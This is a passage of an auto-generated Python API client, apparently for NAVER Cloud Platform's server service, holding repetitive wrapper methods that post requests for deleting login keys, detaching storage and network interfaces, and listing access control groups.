>>> thread = api.delete_init_scripts_with_http_info(delete_init_scripts_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteInitScriptsRequest delete_init_scripts_request: deleteInitScriptsRequest (required)
:return: DeleteInitScriptsResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_init_scripts_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_init_scripts" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_init_scripts_request' is set
if ('delete_init_scripts_request' not in params or
params['delete_init_scripts_request'] is None):
raise ValueError("Missing the required parameter `delete_init_scripts_request` when calling `delete_init_scripts`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_init_scripts_request' in params:
body_params = params['delete_init_scripts_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteInitScripts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteInitScriptsResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_login_keys(self, delete_login_keys_request, **kwargs): # noqa: E501
"""delete_login_keys # noqa: E501
로그인키삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_login_keys(delete_login_keys_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteLoginKeysRequest delete_login_keys_request: deleteLoginKeysRequest (required)
:return: DeleteLoginKeysResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_login_keys_with_http_info(delete_login_keys_request, **kwargs) # noqa: E501
else:
(data) = self.delete_login_keys_with_http_info(delete_login_keys_request, **kwargs) # noqa: E501
return data
def delete_login_keys_with_http_info(self, delete_login_keys_request, **kwargs): # noqa: E501
"""delete_login_keys # noqa: E501
로그인키삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_login_keys_with_http_info(delete_login_keys_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteLoginKeysRequest delete_login_keys_request: deleteLoginKeysRequest (required)
:return: DeleteLoginKeysResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_login_keys_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_login_keys" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_login_keys_request' is set
if ('delete_login_keys_request' not in params or
params['delete_login_keys_request'] is None):
raise ValueError("Missing the required parameter `delete_login_keys_request` when calling `delete_login_keys`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_login_keys_request' in params:
body_params = params['delete_login_keys_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteLoginKeys', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteLoginKeysResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_member_server_image_instances(self, delete_member_server_image_instances_request, **kwargs): # noqa: E501
"""delete_member_server_image_instances # noqa: E501
회원서버이미지인스턴스삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_member_server_image_instances(delete_member_server_image_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteMemberServerImageInstancesRequest delete_member_server_image_instances_request: deleteMemberServerImageInstancesRequest (required)
:return: DeleteMemberServerImageInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_member_server_image_instances_with_http_info(delete_member_server_image_instances_request, **kwargs) # noqa: E501
else:
(data) = self.delete_member_server_image_instances_with_http_info(delete_member_server_image_instances_request, **kwargs) # noqa: E501
return data
def delete_member_server_image_instances_with_http_info(self, delete_member_server_image_instances_request, **kwargs): # noqa: E501
"""delete_member_server_image_instances # noqa: E501
회원서버이미지인스턴스삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_member_server_image_instances_with_http_info(delete_member_server_image_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteMemberServerImageInstancesRequest delete_member_server_image_instances_request: deleteMemberServerImageInstancesRequest (required)
:return: DeleteMemberServerImageInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_member_server_image_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_member_server_image_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_member_server_image_instances_request' is set
if ('delete_member_server_image_instances_request' not in params or
params['delete_member_server_image_instances_request'] is None):
raise ValueError("Missing the required parameter `delete_member_server_image_instances_request` when calling `delete_member_server_image_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_member_server_image_instances_request' in params:
body_params = params['delete_member_server_image_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteMemberServerImageInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteMemberServerImageInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_network_interface(self, delete_network_interface_request, **kwargs): # noqa: E501
"""delete_network_interface # noqa: E501
네트워크인터페이스삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_network_interface(delete_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteNetworkInterfaceRequest delete_network_interface_request: deleteNetworkInterfaceRequest (required)
:return: DeleteNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_network_interface_with_http_info(delete_network_interface_request, **kwargs) # noqa: E501
else:
(data) = self.delete_network_interface_with_http_info(delete_network_interface_request, **kwargs) # noqa: E501
return data
def delete_network_interface_with_http_info(self, delete_network_interface_request, **kwargs): # noqa: E501
"""delete_network_interface # noqa: E501
네트워크인터페이스삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_network_interface_with_http_info(delete_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param DeleteNetworkInterfaceRequest delete_network_interface_request: deleteNetworkInterfaceRequest (required)
:return: DeleteNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_network_interface_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_network_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_network_interface_request' is set
if ('delete_network_interface_request' not in params or
params['delete_network_interface_request'] is None):
raise ValueError("Missing the required parameter `delete_network_interface_request` when calling `delete_network_interface`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_network_interface_request' in params:
body_params = params['delete_network_interface_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deleteNetworkInterface', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeleteNetworkInterfaceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_placement_group(self, delete_placement_group_request, **kwargs): # noqa: E501
"""delete_placement_group # noqa: E501
물리배치그룹삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_placement_group(delete_placement_group_request, async=True)
>>> result = thread.get()
:param async bool
:param DeletePlacementGroupRequest delete_placement_group_request: deletePlacementGroupRequest (required)
:return: DeletePlacementGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_placement_group_with_http_info(delete_placement_group_request, **kwargs) # noqa: E501
else:
(data) = self.delete_placement_group_with_http_info(delete_placement_group_request, **kwargs) # noqa: E501
return data
def delete_placement_group_with_http_info(self, delete_placement_group_request, **kwargs): # noqa: E501
"""delete_placement_group # noqa: E501
물리배치그룹삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_placement_group_with_http_info(delete_placement_group_request, async=True)
>>> result = thread.get()
:param async bool
:param DeletePlacementGroupRequest delete_placement_group_request: deletePlacementGroupRequest (required)
:return: DeletePlacementGroupResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_placement_group_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_placement_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_placement_group_request' is set
if ('delete_placement_group_request' not in params or
params['delete_placement_group_request'] is None):
raise ValueError("Missing the required parameter `delete_placement_group_request` when calling `delete_placement_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_placement_group_request' in params:
body_params = params['delete_placement_group_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deletePlacementGroup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeletePlacementGroupResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_public_ip_instance(self, delete_public_ip_instance_request, **kwargs): # noqa: E501
"""delete_public_ip_instance # noqa: E501
공인IP인스턴스삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_public_ip_instance(delete_public_ip_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param DeletePublicIpInstanceRequest delete_public_ip_instance_request: deletePublicIpInstanceRequest (required)
:return: DeletePublicIpInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.delete_public_ip_instance_with_http_info(delete_public_ip_instance_request, **kwargs) # noqa: E501
else:
(data) = self.delete_public_ip_instance_with_http_info(delete_public_ip_instance_request, **kwargs) # noqa: E501
return data
def delete_public_ip_instance_with_http_info(self, delete_public_ip_instance_request, **kwargs): # noqa: E501
"""delete_public_ip_instance # noqa: E501
공인IP인스턴스삭제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.delete_public_ip_instance_with_http_info(delete_public_ip_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param DeletePublicIpInstanceRequest delete_public_ip_instance_request: deletePublicIpInstanceRequest (required)
:return: DeletePublicIpInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['delete_public_ip_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_public_ip_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'delete_public_ip_instance_request' is set
if ('delete_public_ip_instance_request' not in params or
params['delete_public_ip_instance_request'] is None):
raise ValueError("Missing the required parameter `delete_public_ip_instance_request` when calling `delete_public_ip_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'delete_public_ip_instance_request' in params:
body_params = params['delete_public_ip_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/deletePublicIpInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeletePublicIpInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def detach_block_storage_instances(self, detach_block_storage_instances_request, **kwargs): # noqa: E501
"""detach_block_storage_instances # noqa: E501
블록스토리지인스턴스할당해제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.detach_block_storage_instances(detach_block_storage_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DetachBlockStorageInstancesRequest detach_block_storage_instances_request: detachBlockStorageInstancesRequest (required)
:return: DetachBlockStorageInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.detach_block_storage_instances_with_http_info(detach_block_storage_instances_request, **kwargs) # noqa: E501
else:
(data) = self.detach_block_storage_instances_with_http_info(detach_block_storage_instances_request, **kwargs) # noqa: E501
return data
def detach_block_storage_instances_with_http_info(self, detach_block_storage_instances_request, **kwargs): # noqa: E501
"""detach_block_storage_instances # noqa: E501
블록스토리지인스턴스할당해제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.detach_block_storage_instances_with_http_info(detach_block_storage_instances_request, async=True)
>>> result = thread.get()
:param async bool
:param DetachBlockStorageInstancesRequest detach_block_storage_instances_request: detachBlockStorageInstancesRequest (required)
:return: DetachBlockStorageInstancesResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['detach_block_storage_instances_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method detach_block_storage_instances" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'detach_block_storage_instances_request' is set
if ('detach_block_storage_instances_request' not in params or
params['detach_block_storage_instances_request'] is None):
raise ValueError("Missing the required parameter `detach_block_storage_instances_request` when calling `detach_block_storage_instances`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'detach_block_storage_instances_request' in params:
body_params = params['detach_block_storage_instances_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/detachBlockStorageInstances', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DetachBlockStorageInstancesResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def detach_network_interface(self, detach_network_interface_request, **kwargs): # noqa: E501
"""detach_network_interface # noqa: E501
네트워크인터페이스할당해제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.detach_network_interface(detach_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param DetachNetworkInterfaceRequest detach_network_interface_request: detachNetworkInterfaceRequest (required)
:return: DetachNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.detach_network_interface_with_http_info(detach_network_interface_request, **kwargs) # noqa: E501
else:
(data) = self.detach_network_interface_with_http_info(detach_network_interface_request, **kwargs) # noqa: E501
return data
def detach_network_interface_with_http_info(self, detach_network_interface_request, **kwargs): # noqa: E501
"""detach_network_interface # noqa: E501
네트워크인터페이스할당해제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.detach_network_interface_with_http_info(detach_network_interface_request, async=True)
>>> result = thread.get()
:param async bool
:param DetachNetworkInterfaceRequest detach_network_interface_request: detachNetworkInterfaceRequest (required)
:return: DetachNetworkInterfaceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['detach_network_interface_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method detach_network_interface" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'detach_network_interface_request' is set
if ('detach_network_interface_request' not in params or
params['detach_network_interface_request'] is None):
raise ValueError("Missing the required parameter `detach_network_interface_request` when calling `detach_network_interface`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'detach_network_interface_request' in params:
body_params = params['detach_network_interface_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/detachNetworkInterface', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DetachNetworkInterfaceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def disassociate_public_ip_from_server_instance(self, disassociate_public_ip_from_server_instance_request, **kwargs): # noqa: E501
"""disassociate_public_ip_from_server_instance # noqa: E501
공인IP를서버인스턴스에서할당해제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.disassociate_public_ip_from_server_instance(disassociate_public_ip_from_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param DisassociatePublicIpFromServerInstanceRequest disassociate_public_ip_from_server_instance_request: disassociatePublicIpFromServerInstanceRequest (required)
:return: DisassociatePublicIpFromServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.disassociate_public_ip_from_server_instance_with_http_info(disassociate_public_ip_from_server_instance_request, **kwargs) # noqa: E501
else:
(data) = self.disassociate_public_ip_from_server_instance_with_http_info(disassociate_public_ip_from_server_instance_request, **kwargs) # noqa: E501
return data
def disassociate_public_ip_from_server_instance_with_http_info(self, disassociate_public_ip_from_server_instance_request, **kwargs): # noqa: E501
"""disassociate_public_ip_from_server_instance # noqa: E501
공인IP를서버인스턴스에서할당해제 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.disassociate_public_ip_from_server_instance_with_http_info(disassociate_public_ip_from_server_instance_request, async=True)
>>> result = thread.get()
:param async bool
:param DisassociatePublicIpFromServerInstanceRequest disassociate_public_ip_from_server_instance_request: disassociatePublicIpFromServerInstanceRequest (required)
:return: DisassociatePublicIpFromServerInstanceResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['disassociate_public_ip_from_server_instance_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method disassociate_public_ip_from_server_instance" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'disassociate_public_ip_from_server_instance_request' is set
if ('disassociate_public_ip_from_server_instance_request' not in params or
params['disassociate_public_ip_from_server_instance_request'] is None):
raise ValueError("Missing the required parameter `disassociate_public_ip_from_server_instance_request` when calling `disassociate_public_ip_from_server_instance`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'disassociate_public_ip_from_server_instance_request' in params:
body_params = params['disassociate_public_ip_from_server_instance_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/disassociatePublicIpFromServerInstance', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DisassociatePublicIpFromServerInstanceResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_access_control_group_detail(self, get_access_control_group_detail_request, **kwargs): # noqa: E501
"""get_access_control_group_detail # noqa: E501
ACG상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_access_control_group_detail(get_access_control_group_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetAccessControlGroupDetailRequest get_access_control_group_detail_request: getAccessControlGroupDetailRequest (required)
:return: GetAccessControlGroupDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_access_control_group_detail_with_http_info(get_access_control_group_detail_request, **kwargs) # noqa: E501
else:
(data) = self.get_access_control_group_detail_with_http_info(get_access_control_group_detail_request, **kwargs) # noqa: E501
return data
def get_access_control_group_detail_with_http_info(self, get_access_control_group_detail_request, **kwargs): # noqa: E501
"""get_access_control_group_detail # noqa: E501
ACG상세조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_access_control_group_detail_with_http_info(get_access_control_group_detail_request, async=True)
>>> result = thread.get()
:param async bool
:param GetAccessControlGroupDetailRequest get_access_control_group_detail_request: getAccessControlGroupDetailRequest (required)
:return: GetAccessControlGroupDetailResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_access_control_group_detail_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_access_control_group_detail" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_access_control_group_detail_request' is set
if ('get_access_control_group_detail_request' not in params or
params['get_access_control_group_detail_request'] is None):
raise ValueError("Missing the required parameter `get_access_control_group_detail_request` when calling `get_access_control_group_detail`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_access_control_group_detail_request' in params:
body_params = params['get_access_control_group_detail_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getAccessControlGroupDetail', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetAccessControlGroupDetailResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_access_control_group_list(self, get_access_control_group_list_request, **kwargs): # noqa: E501
"""get_access_control_group_list # noqa: E501
ACG리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_access_control_group_list(get_access_control_group_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetAccessControlGroupListRequest get_access_control_group_list_request: getAccessControlGroupListRequest (required)
:return: GetAccessControlGroupListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.get_access_control_group_list_with_http_info(get_access_control_group_list_request, **kwargs) # noqa: E501
else:
(data) = self.get_access_control_group_list_with_http_info(get_access_control_group_list_request, **kwargs) # noqa: E501
return data
def get_access_control_group_list_with_http_info(self, get_access_control_group_list_request, **kwargs): # noqa: E501
"""get_access_control_group_list # noqa: E501
ACG리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_access_control_group_list_with_http_info(get_access_control_group_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetAccessControlGroupListRequest get_access_control_group_list_request: getAccessControlGroupListRequest (required)
:return: GetAccessControlGroupListResponse
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['get_access_control_group_list_request'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_access_control_group_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'get_access_control_group_list_request' is set
if ('get_access_control_group_list_request' not in params or
params['get_access_control_group_list_request'] is None):
raise ValueError("Missing the required parameter `get_access_control_group_list_request` when calling `get_access_control_group_list`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
query_params.append(('responseFormatType', 'json')) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'get_access_control_group_list_request' in params:
body_params = params['get_access_control_group_list_request']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/x-www-form-urlencoded']) # noqa: E501
# Authentication setting
auth_settings = ['x-ncp-iam'] # noqa: E501
return self.api_client.call_api(
'/getAccessControlGroupList', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='GetAccessControlGroupListResponse', # noqa: E501
auth_settings=auth_settings,
_async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def get_access_control_group_rule_list(self, get_access_control_group_rule_list_request, **kwargs): # noqa: E501
"""get_access_control_group_rule_list # noqa: E501
ACGRule리스트조회 # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.get_access_control_group_rule_list(get_access_control_group_rule_list_request, async=True)
>>> result = thread.get()
:param async bool
:param GetAccessControlGroupRuleListRequest get_access_control_group_rule_list_request: getAccessControlGroupRuleListRequest (required)
:return: GetAccessControlGroupRuleListResponse
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
